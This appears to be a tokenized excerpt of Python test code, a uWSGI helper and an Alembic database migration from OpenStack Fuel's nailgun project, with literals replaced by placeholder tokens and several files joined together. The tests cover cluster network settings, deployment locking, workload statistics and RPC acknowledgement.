, <NUM_LIT> ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : { } <EOL> } <EOL> def create_env_using_statuses ( self , cluster_status , node_status ) : <EOL> cluster = self . env . create ( <EOL> cluster_kwargs = { <EOL> '<STR_LIT>' : consts . CLUSTER_NET_PROVIDERS . neutron , <EOL> '<STR_LIT>' : consts . NEUTRON_SEGMENT_TYPES . gre , <EOL> '<STR_LIT:status>' : cluster_status <EOL> } , <EOL> nodes_kwargs = [ <EOL> { '<STR_LIT>' : False , '<STR_LIT:status>' : node_status } , <EOL> { '<STR_LIT>' : False , '<STR_LIT:status>' : node_status } , <EOL> { '<STR_LIT>' : False , '<STR_LIT:status>' : node_status } ] ) <EOL> return cluster <EOL> def test_cluster_locking_during_deployment ( self ) : <EOL> cluster = self . create_env_using_statuses ( <EOL> consts . CLUSTER_STATUSES . deployment , <EOL> consts . NODE_STATUSES . deploying ) <EOL> test_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> resp_nova_net = self . env . nova_networks_put ( <EOL> cluster . id , <EOL> test_nets , <EOL> expect_errors = True ) <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , <EOL> test_nets , <EOL> expect_errors = True ) <EOL> resp_cluster = self . app . put ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : cluster . id } ) , <EOL> jsonutils . dumps ( { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT:foo>" : { "<STR_LIT:bar>" : None } <EOL> } <EOL> } ) , <EOL> headers = self . default_headers , <EOL> expect_errors = True ) <EOL> resp_cluster_get = self . app . get ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : cluster . id } ) , <EOL> headers = self . default_headers ) <EOL> self . assertTrue ( resp_cluster_get . json_body [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( resp_nova_net . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( resp_neutron_net . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( resp_cluster . status_code , <NUM_LIT> ) <EOL> def test_networks_update_after_deployment ( self ) : <EOL> cluster = self . create_env_using_statuses ( <EOL> consts . CLUSTER_STATUSES . operational , <EOL> consts . NODE_STATUSES . ready ) <EOL> test_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> test_nets [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> test_network_name = consts . NETWORKS . management <EOL> mgmt_net = filter ( lambda x : x [ '<STR_LIT:name>' ] == test_network_name , <EOL> test_nets [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> mgmt_net [ '<STR_LIT>' ] = u'<STR_LIT>' <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , test_nets , expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp_neutron_net . status_code ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( test_network_name , mgmt_net [ '<STR_LIT:id>' ] ) , <EOL> resp_neutron_net . json_body [ '<STR_LIT:message>' ] ) <EOL> mgmt_net [ '<STR_LIT>' ] = u'<STR_LIT>' <EOL> resp_neutron_net = self . env . neutron_networks_put ( cluster . id , test_nets ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp_neutron_net . status_code ) <EOL> new_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> modified_net = filter ( lambda x : x [ '<STR_LIT:name>' ] == test_network_name , <EOL> new_nets [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( u'<STR_LIT>' , modified_net [ '<STR_LIT>' ] ) <EOL> self . assertDictEqual ( test_nets [ '<STR_LIT>' ] , <EOL> new_nets [ '<STR_LIT>' ] ) <EOL> def test_admin_network_update_after_deployment ( self ) : <EOL> cluster = self . create_env_using_statuses ( <EOL> consts . CLUSTER_STATUSES . operational , <EOL> consts . NODE_STATUSES . ready ) <EOL> test_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> admin_net = filter ( <EOL> lambda x : x [ '<STR_LIT:name>' ] == consts . NETWORKS . fuelweb_admin , <EOL> test_nets [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> admin_net [ '<STR_LIT>' ] = u'<STR_LIT>' <EOL> admin_net [ '<STR_LIT>' ] = [ [ u'<STR_LIT>' , u'<STR_LIT>' ] ] <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , test_nets , expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp_neutron_net . status_code ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( admin_net [ '<STR_LIT:name>' ] , admin_net [ '<STR_LIT:id>' ] ) , <EOL> resp_neutron_net . json_body [ '<STR_LIT:message>' ] ) <EOL> for node in self . env . nodes : <EOL> self . db . delete ( node ) <EOL> self . db . commit ( ) <EOL> with patch ( '<STR_LIT>' ) : <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , test_nets ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp_neutron_net . status_code ) <EOL> def test_nova_net_networking_parameters ( self ) : <EOL> cluster = self . env . create_cluster ( api = False ) <EOL> self . db . delete ( cluster . network_config ) <EOL> kw = { <EOL> "<STR_LIT>" : consts . NOVA_NET_MANAGERS . VlanManager , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:16> , <EOL> "<STR_LIT>" : [ [ "<STR_LIT>" , "<STR_LIT>" ] ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : cluster . id <EOL> } <EOL> nc = NovaNetworkConfig ( ** kw ) <EOL> self . db . add ( nc ) <EOL> self . db . flush ( ) <EOL> self . db . refresh ( cluster ) <EOL> nw_params = NovaNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> kw . pop ( "<STR_LIT>" ) <EOL> self . assertEqual ( nw_params , kw ) <EOL> def check_neutron_networking_parameters ( self , floating_ranges ) : <EOL> cluster = self . env . create_cluster ( <EOL> api = False , <EOL> net_provider = consts . CLUSTER_NET_PROVIDERS . neutron ) <EOL> self . db . delete ( cluster . network_config ) <EOL> self . network_config [ '<STR_LIT>' ] = floating_ranges <EOL> self . network_config [ '<STR_LIT>' ] = cluster . id <EOL> nc = NeutronConfig ( ** self . network_config ) <EOL> self . db . add ( nc ) <EOL> self . db . flush ( ) <EOL> self . db . refresh ( cluster ) <EOL> nw_params = NeutronNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> self . network_config . pop ( "<STR_LIT>" ) <EOL> self . assertItemsEqual ( nw_params , self . network_config ) <EOL> def test_neutron_networking_parameters_w_single_floating_ranges ( self ) : <EOL> floating_ranges = [ [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> self . check_neutron_networking_parameters ( floating_ranges ) <EOL> def test_neutron_networking_parameters_w_multiple_floating_ranges ( self ) : <EOL> floating_ranges = [ <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> self . check_neutron_networking_parameters ( floating_ranges ) <EOL> def test_neutron_has_internal_and_floating_names ( self ) : <EOL> cluster = self . env . create_cluster ( <EOL> api = False , <EOL> net_provider = consts . CLUSTER_NET_PROVIDERS . neutron ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , cluster . network_config . internal_name ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , cluster . network_config . floating_name ) <EOL> def test_neutron_networking_parameters_baremetal ( self ) : <EOL> attributes_metadata = """<STR_LIT>""" <EOL> cluster = self . env . create_cluster ( <EOL> api = False , <EOL> net_provider = consts . CLUSTER_NET_PROVIDERS . neutron ) <EOL> nw_params = NeutronNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> self . assertNotIn ( '<STR_LIT>' , nw_params ) <EOL> self . assertNotIn ( '<STR_LIT>' , nw_params ) <EOL> Cluster . patch_attributes ( <EOL> cluster , yaml . load ( attributes_metadata % True ) ) <EOL> self . db . refresh ( cluster ) <EOL> nw_params = NeutronNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> self . assertIn ( '<STR_LIT>' , nw_params ) <EOL> self . assertIn ( '<STR_LIT>' , nw_params ) </s>
<s> from oslo_serialization import jsonutils <EOL> from nailgun . test . base import BaseIntegrationTest <EOL> from nailgun . utils import reverse <EOL> class TestReleaseNetworksHandlers ( BaseIntegrationTest ) : <EOL> def setUp ( self ) : <EOL> super ( TestReleaseNetworksHandlers , self ) . setUp ( ) <EOL> self . release = self . env . create_release ( ) <EOL> def test_get ( self ) : <EOL> resp = self . app . get ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> headers = self . default_headers <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . release [ '<STR_LIT>' ] , resp . json ) <EOL> def test_post ( self ) : <EOL> resp = self . app . post ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> headers = self . default_headers , <EOL> expect_errors = True <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_delete ( self ) : <EOL> resp = self . app . delete ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> headers = self . default_headers , <EOL> expect_errors = True <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_put ( self ) : <EOL> data = jsonutils . dumps ( self . release [ '<STR_LIT>' ] ) <EOL> resp = self . app . put ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> data , <EOL> headers = self . default_headers <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) </s>
<s> import datetime <EOL> from nailgun . test . base import BaseTestCase <EOL> from nailgun import consts <EOL> from nailgun . objects import OpenStackWorkloadStats <EOL> from nailgun . objects import OpenStackWorkloadStatsCollection <EOL> from nailgun . settings import settings <EOL> class TestOSWLObject ( BaseTestCase ) : <EOL> def test_oswl_get_last_by_cluster_id_resource_type ( self ) : <EOL> cluster_id = <NUM_LIT:1> <EOL> dt = datetime . datetime . utcnow ( ) <EOL> obj_data = { <EOL> '<STR_LIT>' : cluster_id , <EOL> '<STR_LIT>' : consts . OSWL_RESOURCE_TYPES . vm , <EOL> '<STR_LIT>' : dt . date ( ) , <EOL> '<STR_LIT>' : dt . time ( ) , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> obj = OpenStackWorkloadStats . create ( obj_data ) <EOL> self . assertEqual ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , consts . OSWL_RESOURCE_TYPES . vm ) , <EOL> obj <EOL> ) <EOL> self . assertIsNone ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> <NUM_LIT:0> , consts . OSWL_RESOURCE_TYPES . vm ) <EOL> ) <EOL> self . assertIsNone ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , consts . OSWL_RESOURCE_TYPES . tenant ) <EOL> ) <EOL> OpenStackWorkloadStats . delete ( obj ) <EOL> self . assertIsNone ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , consts . OSWL_RESOURCE_TYPES . vm ) <EOL> ) <EOL> def test_clean_expired_entries ( self ) : <EOL> dt_now = datetime . datetime . utcnow ( ) <EOL> t_delta = datetime . timedelta ( days = settings . OSWL_STORING_PERIOD ) <EOL> entries_to_del_cluster_ids = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> for cluster_id in entries_to_del_cluster_ids : <EOL> obj_kwargs = { <EOL> "<STR_LIT>" : cluster_id , <EOL> "<STR_LIT>" : consts . OSWL_RESOURCE_TYPES . volume , <EOL> "<STR_LIT>" : dt_now . time ( ) , <EOL> "<STR_LIT>" : dt_now . date ( ) - t_delta , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> OpenStackWorkloadStats . create ( obj_kwargs ) <EOL> untouched_obj_kwargs = { <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : consts . OSWL_RESOURCE_TYPES . vm , <EOL> "<STR_LIT>" : dt_now . time ( ) , <EOL> "<STR_LIT>" : dt_now . date ( ) , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> OpenStackWorkloadStats . create ( untouched_obj_kwargs ) <EOL> OpenStackWorkloadStatsCollection . clean_expired_entries ( ) <EOL> self . db . commit ( ) <EOL> for cluster_id in entries_to_del_cluster_ids : <EOL> instance = OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , <EOL> consts . OSWL_RESOURCE_TYPES . volume <EOL> ) <EOL> self . assertIsNone ( instance ) <EOL> untouched_obj = OpenStackWorkloadStats . get_last_by ( <EOL> untouched_obj_kwargs [ "<STR_LIT>" ] , <EOL> consts . OSWL_RESOURCE_TYPES . vm <EOL> ) <EOL> self . assertIsNotNone ( untouched_obj ) <EOL> def test_version_info_serialized ( self ) : <EOL> version_info = { '<STR_LIT>' : '<STR_LIT>' } <EOL> dt = datetime . datetime . utcnow ( ) <EOL> obj = OpenStackWorkloadStats . create ( <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : consts . OSWL_RESOURCE_TYPES . vm , <EOL> '<STR_LIT>' : dt . date ( ) , <EOL> '<STR_LIT>' : dt . time ( ) , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : version_info <EOL> } <EOL> ) <EOL> self . assertEqual ( <EOL> version_info , <EOL> OpenStackWorkloadStats . to_dict ( obj ) [ '<STR_LIT>' ] <EOL> ) </s>
<s> from nailgun . db . sqlalchemy . models import Cluster <EOL> from nailgun . orchestrator . provisioning_serializers import ProvisioningSerializer <EOL> from nailgun . test import base <EOL> class TestFaultTolerance ( base . BaseTestCase ) : <EOL> def test_generating_fault_tolerance_data ( self ) : <EOL> cluster = self . env . create ( <EOL> nodes_kwargs = [ <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> cluster_db = self . db . query ( Cluster ) . get ( cluster [ '<STR_LIT:id>' ] ) <EOL> uids = [ node . uid for node in cluster_db . nodes <EOL> if '<STR_LIT>' in node . roles ] <EOL> correct_res = [ { '<STR_LIT>' : uids , '<STR_LIT>' : <NUM_LIT:2> } ] <EOL> res = ProvisioningSerializer . fault_tolerance ( cluster_db , <EOL> cluster_db . nodes ) <EOL> self . assertEqual ( res , correct_res ) </s>
<s> import netaddr <EOL> from nailgun . extensions . network_manager import utils <EOL> from nailgun . test . base import BaseUnitTest <EOL> class TestNetworkUtils ( BaseUnitTest ) : <EOL> def test_compare_two_macs ( self ) : <EOL> equal_macs = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , netaddr . EUI ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> for mac1 , mac2 in equal_macs : <EOL> self . assertTrue ( utils . is_same_mac ( mac1 , mac2 ) ) <EOL> self . assertFalse ( <EOL> utils . is_same_mac ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_compare_macs_raise_exception ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> utils . is_same_mac ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import mock <EOL> from nailgun import errors <EOL> from nailgun . rpc import receiverd <EOL> from nailgun . test import base <EOL> class TestRpcAcknowledge ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestRpcAcknowledge , self ) . setUp ( ) <EOL> self . receiver = mock . Mock ( ) <EOL> self . connection = mock . Mock ( ) <EOL> self . consumer = receiverd . RPCConsumer ( self . connection , self . receiver ) <EOL> self . msg = mock . Mock ( ) <EOL> self . body = { '<STR_LIT>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:args>' : { } } <EOL> def test_message_acked_if_success ( self ) : <EOL> self . consumer . consume_msg ( self . body , self . msg ) <EOL> self . assertEqual ( self . msg . ack . call_count , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . receiver . test . call_count , <NUM_LIT:1> ) <EOL> def test_message_acked_if_no_task_found ( self ) : <EOL> self . receiver . test . side_effect = errors . CannotFindTask <EOL> self . consumer . consume_msg ( self . body , self . msg ) <EOL> self . assertEqual ( self . receiver . test . call_count , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . msg . ack . call_count , <NUM_LIT:1> ) <EOL> def test_message_acked_if_exception ( self ) : <EOL> self . receiver . test . side_effect = Exception <EOL> self . consumer . consume_msg ( self . body , self . msg ) <EOL> self . assertEqual ( self . receiver . test . call_count , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . msg . ack . call_count , <NUM_LIT:1> ) <EOL> def test_message_requeued_in_case_of_interrupt ( self ) : <EOL> self . receiver . test . side_effect = KeyboardInterrupt <EOL> self . assertRaises ( <EOL> KeyboardInterrupt , <EOL> self . consumer . consume_msg , self . body , self . msg ) <EOL> self . assertFalse ( self . msg . ack . called ) <EOL> self . assertEqual ( self . msg . requeue . call_count , <NUM_LIT:1> ) </s>
<s> try : <EOL> import uwsgidecorators <EOL> except ImportError : <EOL> uwsgidecorators = None <EOL> from nailgun . logger import logger <EOL> def call_task_manager_async ( klass , func , cluster_id , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if uwsgidecorators : <EOL> logger . debug ( '<STR_LIT>' , klass . __name__ , func ) <EOL> instance = klass ( cluster_id = cluster_id ) <EOL> getattr ( instance , func ) ( * args , ** kwargs ) <EOL> if uwsgidecorators : <EOL> logger . debug ( '<STR_LIT>' , klass . __name__ , func ) <EOL> if uwsgidecorators : <EOL> call_task_manager_async = uwsgidecorators . mulefunc ( call_task_manager_async ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = None <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . Text ( ) , nullable = False ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:name>' ] , unique = True ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:status>' , sa . String ( length = <NUM_LIT:8> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:id>' ] , unique = True ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = True ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:status>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:value>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT:label>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:value>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:label>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:value>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:file>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:id>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT:message>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ 